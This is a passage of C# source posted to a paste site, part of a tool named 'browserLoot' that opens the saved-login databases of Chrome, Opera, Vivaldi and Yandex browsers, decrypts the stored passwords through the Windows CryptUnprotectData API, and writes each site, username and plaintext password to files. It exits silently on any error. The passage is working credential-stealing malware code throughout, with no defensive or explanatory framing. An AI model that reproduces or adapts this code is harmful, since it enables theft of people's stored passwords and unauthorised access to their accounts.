  811. var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
  812. if (user != "" && pass != "")
  813. if (pass != "FAIL")
  814.  
  815. if (host.Contains(searchTerm) || searchTerm == "**ALL**")
  816. data =
  817. "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
  818. string[] totalStrings = {data + "\r\nCopyright 2017 browserLoot."};
  819.  
  820. using (var writePasswords = new StreamWriter(Program.FnChrome))
  821. {
  822. foreach (var line in totalStrings)
  823. writePasswords.WriteLine(line);
  824. }
  825. }
  826. catch
  827. {
  828. Environment.Exit(0);
  829. }
  830. }
  831. catch
  832. {
  833. Environment.Exit(0);
  834. }
  835. }
  836.  
  837. public void Opera()
  838. {
  839. var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) +
  840. "\\Opera Software\\Opera Stable\\Login Data";
  841. var searchTerm = string.Empty;
  842. var data = string.Empty;
  843. try
  844. {
  845. var sqlDatabase = new SqliteHandler(installationPath);
  846. sqlDatabase.ReadTable("logins");
  847. if (File.Exists(installationPath))
  848. for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
  849. try
  850. {
  851. var host = sqlDatabase.GetValue(i, "origin_url");
  852. var user = sqlDatabase.GetValue(i, "username_value");
  853. var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
  854. if (user != "" && pass != "")
  855. if (pass != "FAIL")
  856.  
  857. if (host.Contains(searchTerm) || searchTerm == "**ALL**")
  858. data =
  859. "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
  860. string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };
  861.  
  862. using (var writePasswords = new StreamWriter(Program.FnOpera))
  863. {
  864. foreach (var line in totalStrings)
  865. writePasswords.WriteLine(line);
  866. }
  867. }
  868. catch
  869. {
  870. Environment.Exit(0);
  871. }
  872. }
  873. catch
  874. {
  875. Environment.Exit(0);
  876. }
  877. }
  878.  
  879. public void Vivaldi()
  880. {
  881. var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
  882. "\\Vivaldi\\User Data\\Default\\Login Data";
  883. var searchTerm = string.Empty;
  884. var data = string.Empty;
  885. try
  886. {
  887. var sqlDatabase = new SqliteHandler(installationPath);
  888. sqlDatabase.ReadTable("logins");
  889. if (File.Exists(installationPath))
  890. for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
  891. try
  892. {
  893. var host = sqlDatabase.GetValue(i, "origin_url");
  894. var user = sqlDatabase.GetValue(i, "username_value");
  895. var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
  896. if (user != "" && pass != "")
  897. if (pass != "FAIL")
  898.  
  899. if (host.Contains(searchTerm) || searchTerm == "**ALL**")
  900. data =
  901. data =
  902. "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
  903. string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };
  904.  
  905. using (var writePasswords = new StreamWriter(Program.FnVivaldi))
  906. {
  907. foreach (var line in totalStrings)
  908. writePasswords.WriteLine(line);
  909. }
  910. }
  911. catch
  912. {
  913. Environment.Exit(0);
  914. }
  915. }
  916. catch
  917. {
  918. Environment.Exit(0);
  919. }
  920. }
  921.  
  922. public void Yandex()
  923. {
  924. var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
  925. "\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data";
  926. var searchTerm = string.Empty;
  927. var data = string.Empty;
  928. try
  929. {
  930. var sqlDatabase = new SqliteHandler(installationPath);
  931. sqlDatabase.ReadTable("logins");
  932. if (File.Exists(installationPath))
  933. for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
  934. try
  935. {
  936. var host = sqlDatabase.GetValue(i, "origin_url");
  937. var user = sqlDatabase.GetValue(i, "username_value");
  938. var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
  939. if (user != "" && pass != "")
  940. if (pass != "FAIL")
  941.  
  942. if (host.Contains(searchTerm) || searchTerm == "**ALL**")
  943. data =
  944. "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
  945. string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };
  946.  
  947. using (var writePasswords = new StreamWriter(Program.FnYandex))
  948. {
  949. foreach (var line in totalStrings)
  950. writePasswords.WriteLine(line);
  951. }
  952. }
  953. catch
  954. {
  955. Environment.Exit(0);
  956. }
  957. }
  958. catch
  959. {
  960. Environment.Exit(0);
  961. }
  962. }
  963.  
  964. [DllImport("Crypt32.dll", SetLastError = true, CharSet = CharSet.Auto)]
  965. private static extern bool CryptUnprotectData(
  966. ref DATA_BLOB pDataIn,
  967. string szDataDescr,
  968. ref DATA_BLOB pOptionalEntropy,
  969. IntPtr pvReserved,
  970. ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
  971. int dwFlags,
  972. ref DATA_BLOB pDataOut);
  973.  
  974. private static string Decrypt(byte[] Datas)
  975. {
  976. var inj = new DATA_BLOB();
  977. var Ors = new DATA_BLOB();
  978. var Ghandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
  979. inj.pbData = Ghandle.AddrOfPinnedObject();
  980. inj.cbData = Datas.Length;
  981. Ghandle.Free();
  982. var entropy = new DATA_BLOB();
  983. var crypto = new CRYPTPROTECT_PROMPTSTRUCT();
  984. CryptUnprotectData(ref inj, null, ref entropy, IntPtr.Zero, ref crypto, 0, ref Ors);
  985. var Returned = new byte[Ors.cbData + 1];
  986. Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData);
  987. var TheString = Encoding.UTF8.GetString(Returned);
  988. return TheString.Substring(0, TheString.Length - 1);
  989. }
  990.  
  991. [Flags]
  992. private enum CryptProtectPromptFlags
  993. {
  994. CRYPTPROTECT_PROMPT_ON_UNPROTECT = 1,
  995. CRYPTPROTECT_PROMPT_ON_PROTECT = 2
  996. }
  997.  
  998. [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  999. private struct CRYPTPROTECT_PROMPTSTRUCT
  1000. {
  1001. public readonly int cbSize;
  1002. public readonly CryptProtectPromptFlags dwPromptFlags;
  1003. public readonly IntPtr hwndApp;
  1004. public readonly string szPrompt;
  1005. }
  1006.  
  1007. [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  1008. private struct DATA_BLOB
  1009. {
  1010. public int cbData;
  1011. public IntPtr pbData;
  1012. }
  1013. }
  1014.  
  1015. #endregion
  1016.  
  1017. // USG HERE 3
  1018. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!